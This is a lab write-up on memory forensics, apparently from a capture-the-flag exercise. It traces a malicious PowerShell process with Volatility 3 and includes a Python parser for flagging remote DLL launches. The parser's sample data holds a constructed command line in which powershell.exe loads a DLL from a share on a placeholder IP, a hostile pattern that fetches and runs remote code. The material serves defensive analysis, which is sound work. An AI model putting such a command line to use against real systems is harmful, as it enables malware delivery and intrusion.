
Reveal Lab

Endpoint Forensics Lab

First of all, to answer this Endpoint Forensics machine we look at the process list to determine what happened. After installing Volatility 3 from this repository, https://github.com/volatilityfoundation/volatility3, I use the "-f" parameter followed by the location of the memory dump, then "windows.pstree" to get the process tree, and redirect the output to a file. Here is the full command:

python3 vol.py -f /home/kimo/Desktop/192-Reveal.dmp windows.pstree > /home/kimo/Desktop/Reveal.txt

1- To identify the malicious process I dived into the file, and from the PPID and the name of the process I felt it was "4120", the process ID, which means it's a newly created process; secondly, it is the most popular script runner, "powershell.exe". In its command line I found an IP, took it to VirusTotal to identify it, and it's simply malicious.

2- This question simply asks for the PPID, which was already determined in the previous question.

3- The filename used by the malware to execute the second payload is still in the same line, and it's a DLL file. Because we are dealing with PowerShell, every small piece of info will lead you to the important info, btw.

4- We are still in the same command line; the shared folder simply comes right after the IP the malware communicated with (:
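Questions 1 to 4 all come out of one pstree line, so here is an added example (not part of the original writeup) that parses a windows.pstree dump and pulls out exactly those fields: the powershell.exe process, its PPID and parent name, and the IP, share and DLL name from a UNC path in its command line. The pstree rows, the PIDs, the TEST-NET address 203.0.113.10 and the share/DLL names are constructed placeholders, not the lab's values, and the column layout is a simplified version of the plugin's tab-separated output.

```python
import re
from typing import Dict, List

# Constructed sample rows in a simplified windows.pstree layout (PID with the
# plugin's '*' depth prefix, PPID, ImageFileName, Cmd), joined with tabs like
# the real output. All values are placeholders, not from the lab dump.
SAMPLE_ROWS = [
    ("PID", "PPID", "ImageFileName", "Cmd"),
    ("4", "0", "System", ""),
    ("* 620", "4", "smss.exe", r"\SystemRoot\System32\smss.exe"),
    ("** 3388", "3200", "explorer.exe", r"C:\Windows\Explorer.EXE"),
    ("*** 4120", "3388", "powershell.exe",
     r'powershell.exe -c "\\203.0.113.10\share\stage2.dll"'),
    ("*** 4312", "3388", "notepad.exe", r'"C:\Windows\system32\notepad.exe"'),
]
SAMPLE_PSTREE = "\n".join("\t".join(row) for row in SAMPLE_ROWS) + "\n"

# One process row: optional '*' depth markers, PID, PPID, image name, command line.
LINE_RE = re.compile(r"^(\**)\s*(\d+)\t(\d+)\t([^\t]+)\t(.*)$")
# UNC path to a DLL on a remote host: \\<ip>\<share>\<file>.dll
UNC_DLL_RE = re.compile(
    r'\\\\(\d{1,3}(?:\.\d{1,3}){3})\\([^\\\s"]+)\\([^\\\s"]+\.dll)', re.IGNORECASE)


def parse_pstree(text: str) -> List[Dict]:
    """Turn the pstree dump into a list of process dicts; header lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stars, pid, ppid, name, cmd = m.groups()
        procs.append({"depth": len(stars), "pid": int(pid), "ppid": int(ppid),
                      "name": name.strip(), "cmd": cmd.strip()})
    return procs


def find_unc_dll_launches(procs: List[Dict]) -> List[Dict]:
    """Flag powershell.exe processes whose command line points at a DLL on a remote share."""
    by_pid = {p["pid"]: p for p in procs}
    hits = []
    for p in procs:
        if p["name"].lower() != "powershell.exe":
            continue
        m = UNC_DLL_RE.search(p["cmd"])
        if not m:
            continue
        parent = by_pid.get(p["ppid"])
        hits.append({"pid": p["pid"], "ppid": p["ppid"],
                     "parent": parent["name"] if parent else None,
                     "ip": m.group(1), "share": m.group(2), "dll": m.group(3)})
    return hits


if __name__ == "__main__":
    for hit in find_unc_dll_launches(parse_pstree(SAMPLE_PSTREE)):
        print(hit)
```

Point it at the real Reveal.txt by reading the file instead of SAMPLE_PSTREE; the IP is then what goes to VirusTotal and the share and DLL are the answers to questions 3 and 4.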

5- Here they want the MITRE sub-technique ID. The main technique used here is Defense Evasion, and in the sub-stage the payload used a DLL file to execute, so here we go.

6- To determine the username I used Volatility again, but with the UserAssist plugin, and got the username easily. Uncle Elon was compromised; I think the attacker sent him a mail to win an iPhone 16 (:

7- Here I used ThreatFox to determine the name.

Thanks for reading (:
